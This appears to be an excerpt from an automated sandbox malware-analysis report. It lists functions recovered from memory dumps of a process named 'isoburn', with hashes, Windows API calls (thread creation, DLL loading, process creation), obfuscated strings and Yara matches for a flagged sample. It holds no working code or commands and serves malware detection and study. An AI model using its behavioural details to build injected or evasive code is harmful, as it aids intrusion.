                                                            • Opcode Fuzzy Hash: 51ff1d585b12b013e0de8cabe01b575682e46d85018ead8bb45b2a24943c05d1
                                                            • Instruction Fuzzy Hash: B290022134595146F150B15C44086164049ABE0305F55C031A08155D8D8555D9556221

                                                            Control-flow Graph

                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006F9E25
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID: ")$#$#$$u$'$-$-~$.$@k$H$T$Z/$]5$f?$pa$r$vj$}$K
                                                            • API String ID: 2422867632-999386047
                                                            • Opcode ID: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                            • Instruction ID: 08143212bab712e586c099be74831e10063a07b75b052f89923a7232acad75b5
                                                            • Opcode Fuzzy Hash: caec3f54f630bcfe2d08015ea9dee6aeda7323777549f8d43228ce60e88420c6
                                                            • Instruction Fuzzy Hash: A38167B0D05668CBEB20CF85C9597DEBAB1BB45308F1081D9D25C3B291C7BA1A89CF95
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                            • Instruction ID: fce53e1dff7d2fd2873bbd9a224eeb2b8565f2419cdfc1e17b05728d7622d764
                                                            • Opcode Fuzzy Hash: 8674ee1333d5c93e1d07b236c43dd89e49bb57995dcff335a9b695dc55909483
                                                            • Instruction Fuzzy Hash: 7C4151B5A0020ADFDB10DFD8D8809EFB7B9BF88304B108569E905E7255D774AE45CBA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: @J7<
                                                            • API String ID: 3442037557-2016760708
                                                            • Opcode ID: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                            • Instruction ID: e71d30db6cc16e74754cdf3511f9256f0511133ceb0a732e7a595777297a217b
                                                            • Opcode Fuzzy Hash: 53a18ce400100d4a9e9e4d776f5f0b130e91fc4b1c59c36430c1a3198c240cd2
                                                            • Instruction Fuzzy Hash: D9312FB5A0060ADFDB10DFD8C8809EFB7B9BF88304B108559E905AB255D775EE458BA0
                                                            APIs
                                                            • Sleep.KERNELBASE(000007D0), ref: 00713A5B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep
                                                            • String ID: wininet.dll
                                                            • API String ID: 3472027048-3354682871
                                                            • Opcode ID: ee84ed086841c8dcd249fce5eeaf5ff03a74d5cba86a6b0b6845b6f9387c7c9f
                                                            • Instruction ID: fc2dbcd139035b38c367ddbc3c74c10170345a0e980462a70fc4fdc02038051d
                                                            • Opcode Fuzzy Hash: ee84ed086841c8dcd249fce5eeaf5ff03a74d5cba86a6b0b6845b6f9387c7c9f
                                                            • Instruction Fuzzy Hash: C231B2B1600605BBD714DFA8CC84FEBB7B8EF88710F50411EF5596B281D774AA80CBA4
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 007044D2
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction ID: e348a0c7cf2a8148914fa79ad850b2079d39249c5f273324b865cdd7e59c00fb
                                                            • Opcode Fuzzy Hash: 957c8bce729de2cc8ed7641500ef08d8c62cb58811520cf15ef436256feb83a3
                                                            • Instruction Fuzzy Hash: 41010CB5E4020DEBDB10DAE4DC46FDDB3B89B54708F0042A5BA0897281F635EA588B91
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,?,?,?,0070820E,00000010,?,?,?,00000044,?,00000010,0070820E,?,?,?), ref: 00719813
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction ID: 1da29ac5a5fda2b590404879091dd7123e0e2d9d6f6d96d1eea0dc9ba465c49d
                                                            • Opcode Fuzzy Hash: 9d128bd122eca586a97167fd92bb7d9fd6e9da7789e41deaed9ac37ac2debb71
                                                            • Instruction Fuzzy Hash: F101C4B2200208BBCB44DE8DDC81EDB77EDAF8C750F008108BA09E3241D630F8518BA4
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006F9E25
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                            • Instruction ID: 756aa468c4442910728e68a390ea56e0c0011921ce817b78dc404a57851e45b3
                                                            • Opcode Fuzzy Hash: 1b97b46a9ae5abc44ccf320a174470f5cdf91f0fd8b04e699748713ad3e83c62
                                                            • Instruction Fuzzy Hash: 41F0307338021876D26061E99C02FD7B69C8B85BA1F140015F70CEA2C0D9A5B84142A9
                                                            APIs
                                                            • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 006F9E25
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateThread
                                                            • String ID:
                                                            • API String ID: 2422867632-0
                                                            • Opcode ID: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                            • Instruction ID: 23bcf66d2ab1edacd7e4e205b69c51cf331df4c1b854079bbc634f6468ab417b
                                                            • Opcode Fuzzy Hash: f41e01b53d5c13304fbb2a4066231c5b051296b6af9dfc9e354a0b13883b6a3e
                                                            • Instruction Fuzzy Hash: 07F06D7228131872E27062A98C43FD7769C8F95BA1F140019F708EB2C0DAA5B88182F9
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00701969,?,?,00701969,oUq,?,?,00701969,oUq,00001000,?,?,00000000), ref: 0071970C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction ID: ebf361ae5c8e0041f3d295d4756ba0b203b9d4b91d3e06b759871b6398767759
                                                            • Opcode Fuzzy Hash: 649cf4263e1da267630c4240b949a5ff6783a0172db2a83d3ac15580329b4c67
                                                            • Instruction Fuzzy Hash: 4CE0ED76204204BBD714EE59DC45EEB77EDDFC5750F004419F909A7282D671B91087B5
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,5DE58B5E,00000007,00000000,00000004,00000000,00703CE4,000000F4), ref: 0071975C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction ID: 031b7f6f2af9984e5a0157a6c18494acde987160f1fd8bc65e0ac8e0d76df84d
                                                            • Opcode Fuzzy Hash: 4bae0214b527af873c49bc1b75b359249d1a97042f19181d555dc51d879bee4f
                                                            • Instruction Fuzzy Hash: 50E06D72200209BBD614EE58DC45FEB37ADDFC9750F004418FA08A7242C671B95086B4
                                                            APIs
                                                            • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 0070827C
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                            • Instruction ID: 1dd4cb361a67171b0111ec9af02387fc20b70839f39d757ad743124662105fab
                                                            • Opcode Fuzzy Hash: 61844416707df369a3720218dcd580dd056a42e14c0b6dca86c25fad770a8786
                                                            • Instruction Fuzzy Hash: 5DE02675200208E7EF606AA8DC46FA2339CAB48728F4D0760BD5CCB2C2EA3CF8418190
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00701C50,00717EAF,oUq,00701C1D), ref: 00708073
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                            • Instruction ID: cfce3486cfa50e2df5ae608868347a80e3e87208d30391212385c5b6c0db114c
                                                            • Opcode Fuzzy Hash: 4867df6c45b6c76d5f631fac8e314b12bf314785ba8eb18650416cb137e4edf5
                                                            • Instruction Fuzzy Hash: 6CE0C2B1641104AEF360AAB89C0BFA5329C6BA4754F4000A8B608EB2C2DB75E0008128
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,?,00701C50,00717EAF,oUq,00701C1D), ref: 00708073
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                            • Instruction ID: 9283a618e8a4c5e5e3289c83f4eae45e0ed3e2b0e80d9fe9bcb16b5d02d8ef25
                                                            • Opcode Fuzzy Hash: c94da7772c0a79cdffb3182bcb5d212258327ccdc88c63c41feb7feeca1764ba
                                                            • Instruction Fuzzy Hash: 85D05E71644208BBF650E6B99C07FA6328C5B447A8F844064BA48EB2C2EE69F44081B9
                                                            APIs
                                                            • PostThreadMessageW.USER32(?,00000111), ref: 00700D47
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2659349532.00000000006F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 006F0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_6f0000_isoburn.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                            • Instruction ID: dec9142f9c50cfd90a2d765069c8f045d5275a5e22fb8e5ecca0ee92e709fecb
                                                            • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                            • Instruction Fuzzy Hash: 6ED0A967B0001C7AAA0245C8ACC1DFEB76CEB84BA6F004263FF08E2080E6219D020AB1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 498a4325a73e476f84a23142c180fef0ea69a50615c382497e321718fd007130
                                                            • Instruction ID: 430f7359fb4d64ee3200cd65d51fa7916e34d33e58070f8ba5a5845ceaf7445d
                                                            • Opcode Fuzzy Hash: 498a4325a73e476f84a23142c180fef0ea69a50615c382497e321718fd007130
                                                            • Instruction Fuzzy Hash: 61B09B719019C5C9FB11F7604A0C7177944ABD0705F15C571D3034685E4739D1D1E175
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2661629157.0000000004690000.00000040.00000800.00020000.00000000.sdmp, Offset: 04690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4690000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                            • Instruction ID: ba56412558db22ec03a0817ed22637109e7a7928752b6a941bbd90a8ec8737b0
                                                            • Opcode Fuzzy Hash: 472f6697d32d9fe9632113f7375ceada51e32632cf1883ff78d79e9ed814f6cc
                                                            • Instruction Fuzzy Hash: FF41D571618F0D4FDBA8EF689081676B3E6FB59304F50052DD98AC3252FAB4FC468689
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2661629157.0000000004690000.00000040.00000800.00020000.00000000.sdmp, Offset: 04690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4690000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                            • API String ID: 0-3558027158
                                                            • Opcode ID: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                            • Instruction ID: 022b6737340c0b3f45c6bd3141749e0f029e9c47595ce203a0175c784a2956e6
                                                            • Opcode Fuzzy Hash: c3f6bb3eb17d3cf2440808d53dad2e0acb0b3211d8a5a46298aef4fe41500a8d
                                                            • Instruction Fuzzy Hash: 669161F04082988AC7158F55A0652AFFFB5EBC6305F15816DE7E6BB243C3BE8905CB85
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: e7006b3392f9be363b803d81d806856b50fd9972c2ad311eee45a750db9b80fe
                                                            • Instruction ID: 5b0e645b80f9db60a1adb5673b1bb6b998548622f31502b4ebad526e241ce785
                                                            • Opcode Fuzzy Hash: e7006b3392f9be363b803d81d806856b50fd9972c2ad311eee45a750db9b80fe
                                                            • Instruction Fuzzy Hash: 8D5116B2B0011ABFDB11DF988D8097FF7B8BB482047508B69E565D3A41E375FE009BA0
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: b61fbe95b877a86f16df179d5f0d67332c452e82858680e71a7025143868bb78
                                                            • Instruction ID: be1e795b813c29405da26b18c0155f0d578016bb6d3fa0cffef90318c09c01dd
                                                            • Opcode Fuzzy Hash: b61fbe95b877a86f16df179d5f0d67332c452e82858680e71a7025143868bb78
                                                            • Instruction Fuzzy Hash: 5F51C8757006456FDB30EF5CC89097EB7FD9B44204B4488BAE8D6D7681E6B4FA408760
                                                            Strings
                                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04924725
                                                            • Execute=1, xrefs: 04924713
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04924655
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04924742
                                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 04924787
                                                            • ExecuteOptions, xrefs: 049246A0
                                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 049246FC
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                            • API String ID: 0-484625025
                                                            • Opcode ID: 837907338a49f98858859675bbab2a1dcf906082d566ce296fa3e892a1a9d643
                                                            • Instruction ID: 2c3feea3ebf10631659d9feb33ce2bbfc455ba65d4481aad4f66b44bffa14a12
                                                            • Opcode Fuzzy Hash: 837907338a49f98858859675bbab2a1dcf906082d566ce296fa3e892a1a9d643
                                                            • Instruction Fuzzy Hash: 7C51EC31A00219BAFF10EEA5DC45FBA77A8EF46708F040AA9D505E7190E771BE45CF51
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2661629157.0000000004690000.00000040.00000800.00020000.00000000.sdmp, Offset: 04690000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4690000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: "#CO$@Z\X$A\YO$A^[^$G$';$G7^^$ZA_A$ZA_O$Z\XA$^V^Y
                                                            • API String ID: 0-2612338985
                                                            • Opcode ID: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                            • Instruction ID: bbb1b74207bfea0c175a561f58952d150940d27a5d88fd98a0579cdaa2ea46e4
                                                            • Opcode Fuzzy Hash: 7bef59d175adce2c3e5606e9e343edfb177df956938c7e4c98610004d0ab4be2
                                                            • Instruction Fuzzy Hash: CE2155B044474DDBCF14DF90D455ADEBBF1FF14348F8250A8E819AE202D77586A9CB89
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: __aulldvrm
                                                            • String ID: +$-$0$0
                                                            • API String ID: 1302938615-699404926
                                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction ID: 0e2bdac009418781665e05f8005905f8993bd04d0bbcb62b04cb2cad521ca932
                                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                            • Instruction Fuzzy Hash: F981B070E152499FDF248E68CC917FEBBB2AF85350F184B1ADA61E7290D738B840CB51
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: %%%u$[$]:%u
                                                            • API String ID: 48624451-2819853543
                                                            • Opcode ID: 4f1a789e20b2d01d549b78e489b4daf90e82725f8219953196073900187012cb
                                                            • Instruction ID: 06b56bb778cefca34c6dba67e1b84aef56ed1e5ba6142db3287ebba64b6c1454
                                                            • Opcode Fuzzy Hash: 4f1a789e20b2d01d549b78e489b4daf90e82725f8219953196073900187012cb
                                                            • Instruction Fuzzy Hash: 2A215176E04119ABDB10EFA9DC40EEEBBFCEF54744F450566E905E3240E770EA019BA1
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 0492031E
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 049202BD
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 049202E7
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                            • API String ID: 0-2474120054
                                                            • Opcode ID: a8767f973108a21d31ad99f5dbc6dcb2c459e505c569f17b8399bdc7c4368b5f
                                                            • Instruction ID: 7953af803f4403d85d4c5356d7d85cafeb0f5f7686899512d50f6e9166ac7925
                                                            • Opcode Fuzzy Hash: a8767f973108a21d31ad99f5dbc6dcb2c459e505c569f17b8399bdc7c4368b5f
                                                            • Instruction Fuzzy Hash: DAE1AE306057419FD725CF28C984B6AB7E0AF88328F140B69E796CB2D1E774E845DB42
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 04927BAC
                                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04927B7F
                                                            • RTL: Resource at %p, xrefs: 04927B8E
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                            • API String ID: 0-871070163
                                                            • Opcode ID: 899676d55fc8c9f0bda00d89530d31e68ebeab1821b472be55bc18cc9204f83c
                                                            • Instruction ID: 9b32153c9d094219b37bbe6a03d1543365ffc8a0e43382a3abafc3a7b1cf26e0
                                                            • Opcode Fuzzy Hash: 899676d55fc8c9f0bda00d89530d31e68ebeab1821b472be55bc18cc9204f83c
                                                            • Instruction Fuzzy Hash: 4B41F4317017029FD724DE25C940B26B7E5EF8A715F000F2DE956DB680D731F8058B91
                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0492728C
                                                            Strings
                                                            • RTL: Re-Waiting, xrefs: 049272C1
                                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04927294
                                                            • RTL: Resource at %p, xrefs: 049272A3
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.2662009955.0000000004880000.00000040.00001000.00020000.00000000.sdmp, Offset: 04880000, based on PE: true
                                                            • Associated: 00000006.00000002.2662009955.00000000049A9000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.00000000049AD000.00000040.00001000.00020000.00000000.sdmp
                                                            • Associated: 00000006.00000002.2662009955.0000000004A1E000.00000040.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_6_2_4880000_isoburn.jbxd
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
